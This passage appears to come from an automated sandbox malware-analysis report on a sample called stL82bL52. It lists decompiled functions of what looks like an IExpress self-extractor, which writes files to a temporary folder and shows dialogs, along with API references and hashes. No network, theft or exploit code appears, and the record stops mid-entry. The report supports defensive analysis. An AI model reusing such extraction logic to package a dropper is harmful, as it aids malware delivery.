                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f41be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001F30B4), ref: 001F4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001F30B4), ref: 001F41E7
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: bc071664e24d3069417149a35dbac624dafbb3274c460a5dfa917a5b65680ca9
                                                                                                                                                                                                        • Instruction ID: 815b38447ee72249d8cb0eaab9e7210c660a14881de331337748843d5264f1da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc071664e24d3069417149a35dbac624dafbb3274c460a5dfa917a5b65680ca9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D01F4F130421C7FF32426665C96F7B218EDFE47A5F154025B709E2580DF68EC4181B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0x1f8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x1f8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0x1f8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x001f715d
                                                                                                                                                                                                        0x001f7161
                                                                                                                                                                                                        0x001f7165
                                                                                                                                                                                                        0x001f7178
                                                                                                                                                                                                        0x001f7182
                                                                                                                                                                                                        0x001f718e
                                                                                                                                                                                                        0x001f7197
                                                                                                                                                                                                        0x001f71a0
                                                                                                                                                                                                        0x001f71b1
                                                                                                                                                                                                        0x001f71b8
                                                                                                                                                                                                        0x001f71c4
                                                                                                                                                                                                        0x001f71c7
                                                                                                                                                                                                        0x001f71cb
                                                                                                                                                                                                        0x001f71d5
                                                                                                                                                                                                        0x001f71da
                                                                                                                                                                                                        0x001f71da
                                                                                                                                                                                                        0x001f71dc
                                                                                                                                                                                                        0x001f71dc
                                                                                                                                                                                                        0x001f71e2
                                                                                                                                                                                                        0x001f71e5
                                                                                                                                                                                                        0x001f71ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 001F7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001F719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 001F71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 001F71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 8d583c40051241b8816573c2f84b042f7f5cf03928d8233dd3e87b7d87823cb8
                                                                                                                                                                                                        • Instruction ID: 0657cbb5797b28c135ccbe45cfe5859373df0a5d072aabc01c1fdfd5fbbaac93
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d583c40051241b8816573c2f84b042f7f5cf03928d8233dd3e87b7d87823cb8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7112EB1D09208DFCB10DFB8DA48AAEBBF4FF48315FA14855E909E7250EB349A45CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E001F43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x1f9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x001f19e0
                                                                                                                                                                                                        0x001f19e0
                                                                                                                                                                                                        0x001f19eb
                                                                                                                                                                                                        0x001f19f2
                                                                                                                                                                                                        0x001f19f9
                                                                                                                                                                                                        0x001f19fc
                                                                                                                                                                                                        0x001f1a01
                                                                                                                                                                                                        0x001f1a2a
                                                                                                                                                                                                        0x001f1a2e
                                                                                                                                                                                                        0x001f1a3e
                                                                                                                                                                                                        0x001f1a4f
                                                                                                                                                                                                        0x001f1a62
                                                                                                                                                                                                        0x001f1a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1a03
                                                                                                                                                                                                        0x001f1a06
                                                                                                                                                                                                        0x001f1a20
                                                                                                                                                                                                        0x001f1a20
                                                                                                                                                                                                        0x001f1a08
                                                                                                                                                                                                        0x001f1a08
                                                                                                                                                                                                        0x001f1a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1a16
                                                                                                                                                                                                        0x001f1a18
                                                                                                                                                                                                        0x001f1a70
                                                                                                                                                                                                        0x001f1a72
                                                                                                                                                                                                        0x001f1a72
                                                                                                                                                                                                        0x001f1a14
                                                                                                                                                                                                        0x001f1a06
                                                                                                                                                                                                        0x001f1a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 001F1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 001F1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 001F1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 0cd5309c8fd95873c21671bbd133441c1cc36329152824e97cbdc42fffc64c3c
                                                                                                                                                                                                        • Instruction ID: f5f79814c1cdd3429e76ee1d2a23bf484f8e6e3fe2d14ec3a53e76ab312749d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cd5309c8fd95873c21671bbd133441c1cc36329152824e97cbdc42fffc64c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3211CB7160019DABCB00EF68EE08ABE77B8EF09300F418150FA1A93590CB34AE91CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E001F63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E001F1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				E001F658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x001f63cb
                                                                                                                                                                                                        0x001f63d2
                                                                                                                                                                                                        0x001f63d8
                                                                                                                                                                                                        0x001f63ea
                                                                                                                                                                                                        0x001f63f3
                                                                                                                                                                                                        0x001f6401
                                                                                                                                                                                                        0x001f6402
                                                                                                                                                                                                        0x001f6410
                                                                                                                                                                                                        0x001f6415
                                                                                                                                                                                                        0x001f6433
                                                                                                                                                                                                        0x001f6438
                                                                                                                                                                                                        0x001f6449
                                                                                                                                                                                                        0x001f6463
                                                                                                                                                                                                        0x001f646d
                                                                                                                                                                                                        0x001f6477
                                                                                                                                                                                                        0x001f6477
                                                                                                                                                                                                        0x001f647a
                                                                                                                                                                                                        0x001f643a
                                                                                                                                                                                                        0x001f643a
                                                                                                                                                                                                        0x001f6444
                                                                                                                                                                                                        0x001f6444
                                                                                                                                                                                                        0x001f6492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-1610346413
                                                                                                                                                                                                        • Opcode ID: 731829335fb5e36bd5d67e8b8a23ddd2a95113cacbf022b04f4d38cfc56126eb
                                                                                                                                                                                                        • Instruction ID: b28d3739574ffcaf7be9c37de62c872012f778f9c5a3c9d8671fd80b30805203
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 731829335fb5e36bd5d67e8b8a23ddd2a95113cacbf022b04f4d38cfc56126eb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521C3B1A0021CABD710EF25DC85FFA7368EB94314F1041A9B689A3180DBB46D85CF64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E001F1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0x1f91e0; // 0x27e8ea8
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0x1f91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					E001F44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        				E001F44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x001f47e8
                                                                                                                                                                                                        0x001f47f0
                                                                                                                                                                                                        0x001f47f4
                                                                                                                                                                                                        0x001f480f
                                                                                                                                                                                                        0x001f4811
                                                                                                                                                                                                        0x001f4814
                                                                                                                                                                                                        0x001f4814
                                                                                                                                                                                                        0x001f4816
                                                                                                                                                                                                        0x001f4817
                                                                                                                                                                                                        0x001f4829
                                                                                                                                                                                                        0x001f482b
                                                                                                                                                                                                        0x001f482f
                                                                                                                                                                                                        0x001f484f
                                                                                                                                                                                                        0x001f4852
                                                                                                                                                                                                        0x001f4855
                                                                                                                                                                                                        0x001f4855
                                                                                                                                                                                                        0x001f4857
                                                                                                                                                                                                        0x001f4858
                                                                                                                                                                                                        0x001f4860
                                                                                                                                                                                                        0x001f4865
                                                                                                                                                                                                        0x001f486a
                                                                                                                                                                                                        0x001f486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4876
                                                                                                                                                                                                        0x001f4831
                                                                                                                                                                                                        0x001f4841
                                                                                                                                                                                                        0x001f4847
                                                                                                                                                                                                        0x001f480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f480b
                                                                                                                                                                                                        0x001f47f6
                                                                                                                                                                                                        0x001f4806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,001F4E6F), ref: 001F47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 001F4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 001F4847
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-1610346413
                                                                                                                                                                                                        • Opcode ID: a5edf22fe9964f165968b8150747bc5020b3dad0c83c35ab5e3edf09532e84c3
                                                                                                                                                                                                        • Instruction ID: 1fe8520dc984a31491a20f8f5c77d090e9b3ed458033bd463880ddc36489d9b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5edf22fe9964f165968b8150747bc5020b3dad0c83c35ab5e3edf09532e84c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 361155B8208601AFE7189F64AC18F733B5AEBC1350B088518FF86DB740DB398C02C660
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E001F6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0x1f9a3c; // 0x1f0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E001F44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x001f651f
                                                                                                                                                                                                        0x001f652a
                                                                                                                                                                                                        0x001f6534
                                                                                                                                                                                                        0x001f656b
                                                                                                                                                                                                        0x001f6577
                                                                                                                                                                                                        0x001f657c
                                                                                                                                                                                                        0x001f6536
                                                                                                                                                                                                        0x001f653e
                                                                                                                                                                                                        0x001f6542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6544
                                                                                                                                                                                                        0x001f6547
                                                                                                                                                                                                        0x001f654c
                                                                                                                                                                                                        0x001f6549
                                                                                                                                                                                                        0x001f6549
                                                                                                                                                                                                        0x001f6549
                                                                                                                                                                                                        0x001f655e
                                                                                                                                                                                                        0x001f6560
                                                                                                                                                                                                        0x001f6569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6569
                                                                                                                                                                                                        0x001f6542
                                                                                                                                                                                                        0x001f6587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
